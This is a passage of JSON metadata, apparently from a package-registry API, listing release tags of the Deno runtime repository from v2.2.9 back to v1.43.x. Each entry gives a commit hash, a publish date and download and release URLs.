/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"